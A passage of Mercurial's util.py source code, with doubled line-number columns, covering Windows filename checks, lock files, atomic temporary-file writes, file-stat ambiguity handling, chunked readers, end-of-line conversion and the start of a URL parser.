1686 1685 "filename contains 'con', which is reserved on Windows"
1687 1686 >>> checkwinfilename(b"foo/con.xml/bar")
1688 1687 "filename contains 'con', which is reserved on Windows"
1689 1688 >>> checkwinfilename(b"foo/bar/xml.con")
1690 1689 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1691 1690 "filename contains 'AUX', which is reserved on Windows"
1692 1691 >>> checkwinfilename(b"foo/bar/bla:.txt")
1693 1692 "filename contains ':', which is reserved on Windows"
1694 1693 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1695 1694 "filename contains '\\x07', which is invalid on Windows"
1696 1695 >>> checkwinfilename(b"foo/bar/bla ")
1697 1696 "filename ends with ' ', which is not allowed on Windows"
1698 1697 >>> checkwinfilename(b"../bar")
1699 1698 >>> checkwinfilename(b"foo\\")
1700 1699 "filename ends with '\\', which is invalid on Windows"
1701 1700 >>> checkwinfilename(b"foo\\/bar")
1702 1701 "directory name ends with '\\', which is invalid on Windows"
1703 1702 '''
1704 1703 if path.endswith('\\'):
1705 1704 return _("filename ends with '\\', which is invalid on Windows")
1706 1705 if '\\/' in path:
1707 1706 return _("directory name ends with '\\', which is invalid on Windows")
1708 1707 for n in path.replace('\\', '/').split('/'):
1709 1708 if not n:
1710 1709 continue
1711 1710 for c in _filenamebytestr(n):
1712 1711 if c in _winreservedchars:
1713 1712 return _("filename contains '%s', which is reserved "
1714 1713 "on Windows") % c
1715 1714 if ord(c) <= 31:
1716 1715 return _("filename contains '%s', which is invalid "
1717 1716 "on Windows") % stringutil.escapestr(c)
1718 1717 base = n.split('.')[0]
1719 1718 if base and base.lower() in _winreservednames:
1720 1719 return _("filename contains '%s', which is reserved "
1721 1720 "on Windows") % base
1722 1721 t = n[-1:]
1723 1722 if t in '. ' and n not in '..':
1724 1723 return _("filename ends with '%s', which is not allowed "
1725 1724 "on Windows") % t
1726 1725
1727 1726 if pycompat.iswindows:
1728 1727 checkosfilename = checkwinfilename
1729 1728 timer = time.clock
1730 1729 else:
1731 1730 checkosfilename = platform.checkosfilename
1732 1731 timer = time.time
1733 1732
1734 1733 if safehasattr(time, "perf_counter"):
1735 1734 timer = time.perf_counter
1736 1735
1737 1736 def makelock(info, pathname):
1738 1737 """Create a lock file atomically if possible
1739 1738
1740 1739 This may leave a stale lock file if symlink isn't supported and signal
1741 1740 interrupt is enabled.
1742 1741 """
1743 1742 try:
1744 1743 return os.symlink(info, pathname)
1745 1744 except OSError as why:
1746 1745 if why.errno == errno.EEXIST:
1747 1746 raise
1748 1747 except AttributeError: # no symlink in os
1749 1748 pass
1750 1749
1751 1750 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1752 1751 ld = os.open(pathname, flags)
1753 1752 os.write(ld, info)
1754 1753 os.close(ld)
1755 1754
1756 1755 def readlock(pathname):
1757 1756 try:
1758 1757 return os.readlink(pathname)
1759 1758 except OSError as why:
1760 1759 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1761 1760 raise
1762 1761 except AttributeError: # no symlink in os
1763 1762 pass
1764 1763 fp = posixfile(pathname, 'rb')
1765 1764 r = fp.read()
1766 1765 fp.close()
1767 1766 return r
1768 1767
1769 1768 def fstat(fp):
1770 1769 '''stat file object that may not have fileno method.'''
1771 1770 try:
1772 1771 return os.fstat(fp.fileno())
1773 1772 except AttributeError:
1774 1773 return os.stat(fp.name)
1775 1774
1776 1775 # File system features
1777 1776
1778 1777 def fscasesensitive(path):
1779 1778 """
1780 1779 Return true if the given path is on a case-sensitive filesystem
1781 1780
1782 1781 Requires a path (like /foo/.hg) ending with a foldable final
1783 1782 directory component.
1784 1783 """
1785 1784 s1 = os.lstat(path)
1786 1785 d, b = os.path.split(path)
1787 1786 b2 = b.upper()
1788 1787 if b == b2:
1789 1788 b2 = b.lower()
1790 1789 if b == b2:
1791 1790 return True # no evidence against case sensitivity
1792 1791 p2 = os.path.join(d, b2)
1793 1792 try:
1794 1793 s2 = os.lstat(p2)
1795 1794 if s2 == s1:
1796 1795 return False
1797 1796 return True
1798 1797 except OSError:
1799 1798 return True
1800 1799
1801 1800 try:
1802 1801 import re2
1803 1802 _re2 = None
1804 1803 except ImportError:
1805 1804 _re2 = False
1806 1805
1807 1806 class _re(object):
1808 1807 def _checkre2(self):
1809 1808 global _re2
1810 1809 try:
1811 1810 # check if match works, see issue3964
1812 1811 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1813 1812 except ImportError:
1814 1813 _re2 = False
1815 1814
1816 1815 def compile(self, pat, flags=0):
1817 1816 '''Compile a regular expression, using re2 if possible
1818 1817
1819 1818 For best performance, use only re2-compatible regexp features. The
1820 1819 only flags from the re module that are re2-compatible are
1821 1820 IGNORECASE and MULTILINE.'''
1822 1821 if _re2 is None:
1823 1822 self._checkre2()
1824 1823 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1825 1824 if flags & remod.IGNORECASE:
1826 1825 pat = '(?i)' + pat
1827 1826 if flags & remod.MULTILINE:
1828 1827 pat = '(?m)' + pat
1829 1828 try:
1830 1829 return re2.compile(pat)
1831 1830 except re2.error:
1832 1831 pass
1833 1832 return remod.compile(pat, flags)
1834 1833
1835 1834 @propertycache
1836 1835 def escape(self):
1837 1836 '''Return the version of escape corresponding to self.compile.
1838 1837
1839 1838 This is imperfect because whether re2 or re is used for a particular
1840 1839 function depends on the flags, etc, but it's the best we can do.
1841 1840 '''
1842 1841 global _re2
1843 1842 if _re2 is None:
1844 1843 self._checkre2()
1845 1844 if _re2:
1846 1845 return re2.escape
1847 1846 else:
1848 1847 return remod.escape
1849 1848
1850 1849 re = _re()
1851 1850
1852 1851 _fspathcache = {}
1853 1852 def fspath(name, root):
1854 1853 '''Get name in the case stored in the filesystem
1855 1854
1856 1855 The name should be relative to root, and be normcase-ed for efficiency.
1857 1856
1858 1857 Note that this function is unnecessary, and should not be
1859 1858 called, for case-sensitive filesystems (simply because it's expensive).
1860 1859
1861 1860 The root should be normcase-ed, too.
1862 1861 '''
1863 1862 def _makefspathcacheentry(dir):
1864 1863 return dict((normcase(n), n) for n in os.listdir(dir))
1865 1864
1866 1865 seps = pycompat.ossep
1867 1866 if pycompat.osaltsep:
1868 1867 seps = seps + pycompat.osaltsep
1869 1868 # Protect backslashes. This gets silly very quickly.
1870 1869 seps.replace('\\','\\\\')
1871 1870 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1872 1871 dir = os.path.normpath(root)
1873 1872 result = []
1874 1873 for part, sep in pattern.findall(name):
1875 1874 if sep:
1876 1875 result.append(sep)
1877 1876 continue
1878 1877
1879 1878 if dir not in _fspathcache:
1880 1879 _fspathcache[dir] = _makefspathcacheentry(dir)
1881 1880 contents = _fspathcache[dir]
1882 1881
1883 1882 found = contents.get(part)
1884 1883 if not found:
1885 1884 # retry "once per directory" per "dirstate.walk" which
1886 1885 # may take place for each patches of "hg qpush", for example
1887 1886 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1888 1887 found = contents.get(part)
1889 1888
1890 1889 result.append(found or part)
1891 1890 dir = os.path.join(dir, part)
1892 1891
1893 1892 return ''.join(result)
1894 1893
1895 1894 def checknlink(testfile):
1896 1895 '''check whether hardlink count reporting works properly'''
1897 1896
1898 1897 # testfile may be open, so we need a separate file for checking to
1899 1898 # work around issue2543 (or testfile may get lost on Samba shares)
1900 1899 f1, f2, fp = None, None, None
1901 1900 try:
1902 1901 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1903 1902 suffix='1~', dir=os.path.dirname(testfile))
1904 1903 os.close(fd)
1905 1904 f2 = '%s2~' % f1[:-2]
1906 1905
1907 1906 oslink(f1, f2)
1908 1907 # nlinks() may behave differently for files on Windows shares if
1909 1908 # the file is open.
1910 1909 fp = posixfile(f2)
1911 1910 return nlinks(f2) > 1
1912 1911 except OSError:
1913 1912 return False
1914 1913 finally:
1915 1914 if fp is not None:
1916 1915 fp.close()
1917 1916 for f in (f1, f2):
1918 1917 try:
1919 1918 if f is not None:
1920 1919 os.unlink(f)
1921 1920 except OSError:
1922 1921 pass
1923 1922
1924 1923 def endswithsep(path):
1925 1924 '''Check path ends with os.sep or os.altsep.'''
1926 1925 return (path.endswith(pycompat.ossep)
1927 1926 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1928 1927
1929 1928 def splitpath(path):
1930 1929 '''Split path by os.sep.
1931 1930 Note that this function does not use os.altsep because this is
1932 1931 an alternative of simple "xxx.split(os.sep)".
1933 1932 It is recommended to use os.path.normpath() before using this
1934 1933 function if need.'''
1935 1934 return path.split(pycompat.ossep)
1936 1935
1937 1936 def mktempcopy(name, emptyok=False, createmode=None):
1938 1937 """Create a temporary file with the same contents from name
1939 1938
1940 1939 The permission bits are copied from the original file.
1941 1940
1942 1941 If the temporary file is going to be truncated immediately, you
1943 1942 can use emptyok=True as an optimization.
1944 1943
1945 1944 Returns the name of the temporary file.
1946 1945 """
1947 1946 d, fn = os.path.split(name)
1948 1947 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1949 1948 os.close(fd)
1950 1949 # Temporary files are created with mode 0600, which is usually not
1951 1950 # what we want. If the original file already exists, just copy
1952 1951 # its mode. Otherwise, manually obey umask.
1953 1952 copymode(name, temp, createmode)
1954 1953 if emptyok:
1955 1954 return temp
1956 1955 try:
1957 1956 try:
1958 1957 ifp = posixfile(name, "rb")
1959 1958 except IOError as inst:
1960 1959 if inst.errno == errno.ENOENT:
1961 1960 return temp
1962 1961 if not getattr(inst, 'filename', None):
1963 1962 inst.filename = name
1964 1963 raise
1965 1964 ofp = posixfile(temp, "wb")
1966 1965 for chunk in filechunkiter(ifp):
1967 1966 ofp.write(chunk)
1968 1967 ifp.close()
1969 1968 ofp.close()
1970 1969 except: # re-raises
1971 1970 try:
1972 1971 os.unlink(temp)
1973 1972 except OSError:
1974 1973 pass
1975 1974 raise
1976 1975 return temp
1977 1976
1978 1977 class filestat(object):
1979 1978 """help to exactly detect change of a file
1980 1979
1981 1980 'stat' attribute is result of 'os.stat()' if specified 'path'
1982 1981 exists. Otherwise, it is None. This can avoid preparative
1983 1982 'exists()' examination on client side of this class.
1984 1983 """
1985 1984 def __init__(self, stat):
1986 1985 self.stat = stat
1987 1986
1988 1987 @classmethod
1989 1988 def frompath(cls, path):
1990 1989 try:
1991 1990 stat = os.stat(path)
1992 1991 except OSError as err:
1993 1992 if err.errno != errno.ENOENT:
1994 1993 raise
1995 1994 stat = None
1996 1995 return cls(stat)
1997 1996
1998 1997 @classmethod
1999 1998 def fromfp(cls, fp):
2000 1999 stat = os.fstat(fp.fileno())
2001 2000 return cls(stat)
2002 2001
2003 2002 __hash__ = object.__hash__
2004 2003
2005 2004 def __eq__(self, old):
2006 2005 try:
2007 2006 # if ambiguity between stat of new and old file is
2008 2007 # avoided, comparison of size, ctime and mtime is enough
2009 2008 # to exactly detect change of a file regardless of platform
2010 2009 return (self.stat.st_size == old.stat.st_size and
2011 2010 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2012 2011 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2013 2012 except AttributeError:
2014 2013 pass
2015 2014 try:
2016 2015 return self.stat is None and old.stat is None
2017 2016 except AttributeError:
2018 2017 return False
2019 2018
2020 2019 def isambig(self, old):
2021 2020 """Examine whether new (= self) stat is ambiguous against old one
2022 2021
2023 2022 "S[N]" below means stat of a file at N-th change:
2024 2023
2025 2024 - S[n-1].ctime < S[n].ctime: can detect change of a file
2026 2025 - S[n-1].ctime == S[n].ctime
2027 2026 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2028 2027 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2029 2028 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2030 2029 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2031 2030
2032 2031 Case (*2) above means that a file was changed twice or more at
2033 2032 same time in sec (= S[n-1].ctime), and comparison of timestamp
2034 2033 is ambiguous.
2035 2034
2036 2035 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2037 2036 timestamp is ambiguous".
2038 2037
2039 2038 But advancing mtime only in case (*2) doesn't work as
2040 2039 expected, because naturally advanced S[n].mtime in case (*1)
2041 2040 might be equal to manually advanced S[n-1 or earlier].mtime.
2042 2041
2043 2042 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2044 2043 treated as ambiguous regardless of mtime, to avoid overlooking
2045 2044 by confliction between such mtime.
2046 2045
2047 2046 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2048 2047 S[n].mtime", even if size of a file isn't changed.
2049 2048 """
2050 2049 try:
2051 2050 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2052 2051 except AttributeError:
2053 2052 return False
2054 2053
2055 2054 def avoidambig(self, path, old):
2056 2055 """Change file stat of specified path to avoid ambiguity
2057 2056
2058 2057 'old' should be previous filestat of 'path'.
2059 2058
2060 2059 This skips avoiding ambiguity, if a process doesn't have
2061 2060 appropriate privileges for 'path'. This returns False in this
2062 2061 case.
2063 2062
2064 2063 Otherwise, this returns True, as "ambiguity is avoided".
2065 2064 """
2066 2065 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2067 2066 try:
2068 2067 os.utime(path, (advanced, advanced))
2069 2068 except OSError as inst:
2070 2069 if inst.errno == errno.EPERM:
2071 2070 # utime() on the file created by another user causes EPERM,
2072 2071 # if a process doesn't have appropriate privileges
2073 2072 return False
2074 2073 raise
2075 2074 return True
2076 2075
2077 2076 def __ne__(self, other):
2078 2077 return not self == other
2079 2078
2080 2079 class atomictempfile(object):
2081 2080 '''writable file object that atomically updates a file
2082 2081
2083 2082 All writes will go to a temporary copy of the original file. Call
2084 2083 close() when you are done writing, and atomictempfile will rename
2085 2084 the temporary copy to the original name, making the changes
2086 2085 visible. If the object is destroyed without being closed, all your
2087 2086 writes are discarded.
2088 2087
2089 2088 checkambig argument of constructor is used with filestat, and is
2090 2089 useful only if target file is guarded by any lock (e.g. repo.lock
2091 2090 or repo.wlock).
2092 2091 '''
2093 2092 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2094 2093 self.__name = name # permanent name
2095 2094 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2096 2095 createmode=createmode)
2097 2096 self._fp = posixfile(self._tempname, mode)
2098 2097 self._checkambig = checkambig
2099 2098
2100 2099 # delegated methods
2101 2100 self.read = self._fp.read
2102 2101 self.write = self._fp.write
2103 2102 self.seek = self._fp.seek
2104 2103 self.tell = self._fp.tell
2105 2104 self.fileno = self._fp.fileno
2106 2105
2107 2106 def close(self):
2108 2107 if not self._fp.closed:
2109 2108 self._fp.close()
2110 2109 filename = localpath(self.__name)
2111 2110 oldstat = self._checkambig and filestat.frompath(filename)
2112 2111 if oldstat and oldstat.stat:
2113 2112 rename(self._tempname, filename)
2114 2113 newstat = filestat.frompath(filename)
2115 2114 if newstat.isambig(oldstat):
2116 2115 # stat of changed file is ambiguous to original one
2117 2116 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2118 2117 os.utime(filename, (advanced, advanced))
2119 2118 else:
2120 2119 rename(self._tempname, filename)
2121 2120
2122 2121 def discard(self):
2123 2122 if not self._fp.closed:
2124 2123 try:
2125 2124 os.unlink(self._tempname)
2126 2125 except OSError:
2127 2126 pass
2128 2127 self._fp.close()
2129 2128
2130 2129 def __del__(self):
2131 2130 if safehasattr(self, '_fp'): # constructor actually did something
2132 2131 self.discard()
2133 2132
2134 2133 def __enter__(self):
2135 2134 return self
2136 2135
2137 2136 def __exit__(self, exctype, excvalue, traceback):
2138 2137 if exctype is not None:
2139 2138 self.discard()
2140 2139 else:
2141 2140 self.close()
2142 2141
2143 2142 def unlinkpath(f, ignoremissing=False):
2144 2143 """unlink and remove the directory if it is empty"""
2145 2144 if ignoremissing:
2146 2145 tryunlink(f)
2147 2146 else:
2148 2147 unlink(f)
2149 2148 # try removing directories that might now be empty
2150 2149 try:
2151 2150 removedirs(os.path.dirname(f))
2152 2151 except OSError:
2153 2152 pass
2154 2153
2155 2154 def tryunlink(f):
2156 2155 """Attempt to remove a file, ignoring ENOENT errors."""
2157 2156 try:
2158 2157 unlink(f)
2159 2158 except OSError as e:
2160 2159 if e.errno != errno.ENOENT:
2161 2160 raise
2162 2161
2163 2162 def makedirs(name, mode=None, notindexed=False):
2164 2163 """recursive directory creation with parent mode inheritance
2165 2164
2166 2165 Newly created directories are marked as "not to be indexed by
2167 2166 the content indexing service", if ``notindexed`` is specified
2168 2167 for "write" mode access.
2169 2168 """
2170 2169 try:
2171 2170 makedir(name, notindexed)
2172 2171 except OSError as err:
2173 2172 if err.errno == errno.EEXIST:
2174 2173 return
2175 2174 if err.errno != errno.ENOENT or not name:
2176 2175 raise
2177 2176 parent = os.path.dirname(os.path.abspath(name))
2178 2177 if parent == name:
2179 2178 raise
2180 2179 makedirs(parent, mode, notindexed)
2181 2180 try:
2182 2181 makedir(name, notindexed)
2183 2182 except OSError as err:
2184 2183 # Catch EEXIST to handle races
2185 2184 if err.errno == errno.EEXIST:
2186 2185 return
2187 2186 raise
2188 2187 if mode is not None:
2189 2188 os.chmod(name, mode)
2190 2189
2191 2190 def readfile(path):
2192 2191 with open(path, 'rb') as fp:
2193 2192 return fp.read()
2194 2193
2195 2194 def writefile(path, text):
2196 2195 with open(path, 'wb') as fp:
2197 2196 fp.write(text)
2198 2197
2199 2198 def appendfile(path, text):
2200 2199 with open(path, 'ab') as fp:
2201 2200 fp.write(text)
2202 2201
2203 2202 class chunkbuffer(object):
2204 2203 """Allow arbitrary sized chunks of data to be efficiently read from an
2205 2204 iterator over chunks of arbitrary size."""
2206 2205
2207 2206 def __init__(self, in_iter):
2208 2207 """in_iter is the iterator that's iterating over the input chunks."""
2209 2208 def splitbig(chunks):
2210 2209 for chunk in chunks:
2211 2210 if len(chunk) > 2**20:
2212 2211 pos = 0
2213 2212 while pos < len(chunk):
2214 2213 end = pos + 2 ** 18
2215 2214 yield chunk[pos:end]
2216 2215 pos = end
2217 2216 else:
2218 2217 yield chunk
2219 2218 self.iter = splitbig(in_iter)
2220 2219 self._queue = collections.deque()
2221 2220 self._chunkoffset = 0
2222 2221
2223 2222 def read(self, l=None):
2224 2223 """Read L bytes of data from the iterator of chunks of data.
2225 2224 Returns less than L bytes if the iterator runs dry.
2226 2225
2227 2226 If size parameter is omitted, read everything"""
2228 2227 if l is None:
2229 2228 return ''.join(self.iter)
2230 2229
2231 2230 left = l
2232 2231 buf = []
2233 2232 queue = self._queue
2234 2233 while left > 0:
2235 2234 # refill the queue
2236 2235 if not queue:
2237 2236 target = 2**18
2238 2237 for chunk in self.iter:
2239 2238 queue.append(chunk)
2240 2239 target -= len(chunk)
2241 2240 if target <= 0:
2242 2241 break
2243 2242 if not queue:
2244 2243 break
2245 2244
2246 2245 # The easy way to do this would be to queue.popleft(), modify the
2247 2246 # chunk (if necessary), then queue.appendleft(). However, for cases
2248 2247 # where we read partial chunk content, this incurs 2 dequeue
2249 2248 # mutations and creates a new str for the remaining chunk in the
2250 2249 # queue. Our code below avoids this overhead.
2251 2250
2252 2251 chunk = queue[0]
2253 2252 chunkl = len(chunk)
2254 2253 offset = self._chunkoffset
2255 2254
2256 2255 # Use full chunk.
2257 2256 if offset == 0 and left >= chunkl:
2258 2257 left -= chunkl
2259 2258 queue.popleft()
2260 2259 buf.append(chunk)
2261 2260 # self._chunkoffset remains at 0.
2262 2261 continue
2263 2262
2264 2263 chunkremaining = chunkl - offset
2265 2264
2266 2265 # Use all of unconsumed part of chunk.
2267 2266 if left >= chunkremaining:
2268 2267 left -= chunkremaining
2269 2268 queue.popleft()
2270 2269 # offset == 0 is enabled by block above, so this won't merely
2271 2270 # copy via ``chunk[0:]``.
2272 2271 buf.append(chunk[offset:])
2273 2272 self._chunkoffset = 0
2274 2273
2275 2274 # Partial chunk needed.
2276 2275 else:
2277 2276 buf.append(chunk[offset:offset + left])
2278 2277 self._chunkoffset += left
2279 2278 left -= chunkremaining
2280 2279
2281 2280 return ''.join(buf)
2282 2281
2283 2282 def filechunkiter(f, size=131072, limit=None):
2284 2283 """Create a generator that produces the data in the file size
2285 2284 (default 131072) bytes at a time, up to optional limit (default is
2286 2285 to read all data). Chunks may be less than size bytes if the
2287 2286 chunk is the last chunk in the file, or the file is a socket or
2288 2287 some other type of file that sometimes reads less data than is
2289 2288 requested."""
2290 2289 assert size >= 0
2291 2290 assert limit is None or limit >= 0
2292 2291 while True:
2293 2292 if limit is None:
2294 2293 nbytes = size
2295 2294 else:
2296 2295 nbytes = min(limit, size)
2297 2296 s = nbytes and f.read(nbytes)
2298 2297 if not s:
2299 2298 break
2300 2299 if limit:
2301 2300 limit -= len(s)
2302 2301 yield s
2303 2302
2304 2303 class cappedreader(object):
2305 2304 """A file object proxy that allows reading up to N bytes.
2306 2305
2307 2306 Given a source file object, instances of this type allow reading up to
2308 2307 N bytes from that source file object. Attempts to read past the allowed
2309 2308 limit are treated as EOF.
2310 2309
2311 2310 It is assumed that I/O is not performed on the original file object
2312 2311 in addition to I/O that is performed by this instance. If there is,
2313 2312 state tracking will get out of sync and unexpected results will ensue.
2314 2313 """
2315 2314 def __init__(self, fh, limit):
2316 2315 """Allow reading up to <limit> bytes from <fh>."""
2317 2316 self._fh = fh
2318 2317 self._left = limit
2319 2318
2320 2319 def read(self, n=-1):
2321 2320 if not self._left:
2322 2321 return b''
2323 2322
2324 2323 if n < 0:
2325 2324 n = self._left
2326 2325
2327 2326 data = self._fh.read(min(n, self._left))
2328 2327 self._left -= len(data)
2329 2328 assert self._left >= 0
2330 2329
2331 2330 return data
2332 2331
2333 2332 def readinto(self, b):
2334 2333 res = self.read(len(b))
2335 2334 if res is None:
2336 2335 return None
2337 2336
2338 2337 b[0:len(res)] = res
2339 2338 return len(res)
2340 2339
2341 2340 def unitcountfn(*unittable):
2342 2341 '''return a function that renders a readable count of some quantity'''
2343 2342
2344 2343 def go(count):
2345 2344 for multiplier, divisor, format in unittable:
2346 2345 if abs(count) >= divisor * multiplier:
2347 2346 return format % (count / float(divisor))
2348 2347 return unittable[-1][2] % count
2349 2348
2350 2349 return go
2351 2350
2352 2351 def processlinerange(fromline, toline):
2353 2352 """Check that linerange <fromline>:<toline> makes sense and return a
2354 2353 0-based range.
2355 2354
2356 2355 >>> processlinerange(10, 20)
2357 2356 (9, 20)
2358 2357 >>> processlinerange(2, 1)
2359 2358 Traceback (most recent call last):
2360 2359 ...
2361 2360 ParseError: line range must be positive
2362 2361 >>> processlinerange(0, 5)
2363 2362 Traceback (most recent call last):
2364 2363 ...
2365 2364 ParseError: fromline must be strictly positive
2366 2365 """
2367 2366 if toline - fromline < 0:
2368 2367 raise error.ParseError(_("line range must be positive"))
2369 2368 if fromline < 1:
2370 2369 raise error.ParseError(_("fromline must be strictly positive"))
2371 2370 return fromline - 1, toline
2372 2371
2373 2372 bytecount = unitcountfn(
2374 2373 (100, 1 << 30, _('%.0f GB')),
2375 2374 (10, 1 << 30, _('%.1f GB')),
2376 2375 (1, 1 << 30, _('%.2f GB')),
2377 2376 (100, 1 << 20, _('%.0f MB')),
2378 2377 (10, 1 << 20, _('%.1f MB')),
2379 2378 (1, 1 << 20, _('%.2f MB')),
2380 2379 (100, 1 << 10, _('%.0f KB')),
2381 2380 (10, 1 << 10, _('%.1f KB')),
2382 2381 (1, 1 << 10, _('%.2f KB')),
2383 2382 (1, 1, _('%.0f bytes')),
2384 2383 )
2385 2384
2386 2385 class transformingwriter(object):
2387 2386 """Writable file wrapper to transform data by function"""
2388 2387
2389 2388 def __init__(self, fp, encode):
2390 2389 self._fp = fp
2391 2390 self._encode = encode
2392 2391
2393 2392 def close(self):
2394 2393 self._fp.close()
2395 2394
2396 2395 def flush(self):
2397 2396 self._fp.flush()
2398 2397
2399 2398 def write(self, data):
2400 2399 return self._fp.write(self._encode(data))
2401 2400
2402 2401 # Matches a single EOL which can either be a CRLF where repeated CR
2403 2402 # are removed or a LF. We do not care about old Macintosh files, so a
2404 2403 # stray CR is an error.
2405 2404 _eolre = remod.compile(br'\r*\n')
2406 2405
2407 2406 def tolf(s):
2408 2407 return _eolre.sub('\n', s)
2409 2408
2410 2409 def tocrlf(s):
2411 2410 return _eolre.sub('\r\n', s)
2412 2411
2413 2412 def _crlfwriter(fp):
2414 2413 return transformingwriter(fp, tocrlf)
2415 2414
2416 2415 if pycompat.oslinesep == '\r\n':
2417 2416 tonativeeol = tocrlf
2418 2417 fromnativeeol = tolf
2419 2418 nativeeolwriter = _crlfwriter
2420 2419 else:
2421 2420 tonativeeol = pycompat.identity
2422 2421 fromnativeeol = pycompat.identity
2423 2422 nativeeolwriter = pycompat.identity
2424 2423
2425 2424 if (pyplatform.python_implementation() == 'CPython' and
2426 2425 sys.version_info < (3, 0)):
2427 2426 # There is an issue in CPython that some IO methods do not handle EINTR
2428 2427 # correctly. The following table shows what CPython version (and functions)
2429 2428 # are affected (buggy: has the EINTR bug, okay: otherwise):
2430 2429 #
2431 2430 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2432 2431 # --------------------------------------------------
2433 2432 # fp.__iter__ | buggy | buggy | okay
2434 2433 # fp.read* | buggy | okay [1] | okay
2435 2434 #
2436 2435 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2437 2436 #
2438 2437 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2439 2438 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2440 2439 #
2441 2440 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2442 2441 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2443 2442 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2444 2443 # fp.__iter__ but not other fp.read* methods.
2445 2444 #
2446 2445 # On modern systems like Linux, the "read" syscall cannot be interrupted
2447 2446 # when reading "fast" files like on-disk files. So the EINTR issue only
2448 2447 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2449 2448 # files approximately as "fast" files and use the fast (unsafe) code path,
2450 2449 # to minimize the performance impact.
2451 2450 if sys.version_info >= (2, 7, 4):
2452 2451 # fp.readline deals with EINTR correctly, use it as a workaround.
2453 2452 def _safeiterfile(fp):
2454 2453 return iter(fp.readline, '')
2455 2454 else:
2456 2455 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2457 2456 # note: this may block longer than necessary because of bufsize.
2458 2457 def _safeiterfile(fp, bufsize=4096):
2459 2458 fd = fp.fileno()
2460 2459 line = ''
2461 2460 while True:
2462 2461 try:
2463 2462 buf = os.read(fd, bufsize)
2464 2463 except OSError as ex:
2465 2464 # os.read only raises EINTR before any data is read
2466 2465 if ex.errno == errno.EINTR:
2467 2466 continue
2468 2467 else:
2469 2468 raise
2470 2469 line += buf
2471 2470 if '\n' in buf:
2472 2471 splitted = line.splitlines(True)
2473 2472 line = ''
2474 2473 for l in splitted:
2475 2474 if l[-1] == '\n':
2476 2475 yield l
2477 2476 else:
2478 2477 line = l
2479 2478 if not buf:
2480 2479 break
2481 2480 if line:
2482 2481 yield line
2483 2482
2484 2483 def iterfile(fp):
2485 2484 fastpath = True
2486 2485 if type(fp) is file:
2487 2486 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2488 2487 if fastpath:
2489 2488 return fp
2490 2489 else:
2491 2490 return _safeiterfile(fp)
2492 2491 else:
2493 2492 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2494 2493 def iterfile(fp):
2495 2494 return fp
2496 2495
2497 2496 def iterlines(iterator):
2498 2497 for chunk in iterator:
2499 2498 for line in chunk.splitlines():
2500 2499 yield line
2501 2500
2502 2501 def expandpath(path):
2503 2502 return os.path.expanduser(os.path.expandvars(path))
2504 2503
2505 2504 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2506 2505 """Return the result of interpolating items in the mapping into string s.
2507 2506
2508 2507 prefix is a single character string, or a two character string with
2509 2508 a backslash as the first character if the prefix needs to be escaped in
2510 2509 a regular expression.
2511 2510
2512 2511 fn is an optional function that will be applied to the replacement text
2513 2512 just before replacement.
2514 2513
2515 2514 escape_prefix is an optional flag that allows using doubled prefix for
2516 2515 its escaping.
2517 2516 """
2518 2517 fn = fn or (lambda s: s)
2519 2518 patterns = '|'.join(mapping.keys())
2520 2519 if escape_prefix:
2521 2520 patterns += '|' + prefix
2522 2521 if len(prefix) > 1:
2523 2522 prefix_char = prefix[1:]
2524 2523 else:
2525 2524 prefix_char = prefix
2526 2525 mapping[prefix_char] = prefix_char
2527 2526 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2528 2527 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2529 2528
2530 2529 def getport(port):
2531 2530 """Return the port for a given network service.
2532 2531
2533 2532 If port is an integer, it's returned as is. If it's a string, it's
2534 2533 looked up using socket.getservbyname(). If there's no matching
2535 2534 service, error.Abort is raised.
2536 2535 """
2537 2536 try:
2538 2537 return int(port)
2539 2538 except ValueError:
2540 2539 pass
2541 2540
2542 2541 try:
2543 2542 return socket.getservbyname(pycompat.sysstr(port))
2544 2543 except socket.error:
2545 2544 raise error.Abort(_("no port number associated with service '%s'")
2546 2545 % port)
2547 2546
2548 2547 class url(object):
2549 2548 r"""Reliable URL parser.
2550 2549
2551 2550 This parses URLs and provides attributes for the following
2552 2551 components:
2553 2552
2554 2553 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2555 2554
2556 2555 Missing components are set to None. The only exception is
2557 2556 fragment, which is set to '' if present but empty.
2558 2557
